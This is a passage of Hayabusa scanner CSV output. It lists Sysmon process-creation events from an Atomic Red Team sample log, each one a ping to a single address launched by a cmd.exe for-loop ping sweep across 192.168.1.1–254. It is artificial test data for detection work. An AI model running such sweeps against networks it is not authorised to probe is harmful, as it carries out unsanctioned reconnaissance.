C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do 
ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" 
/c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 
-w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:00.621 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 
747F3D96-D94E-5D31-0000-0010C58B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
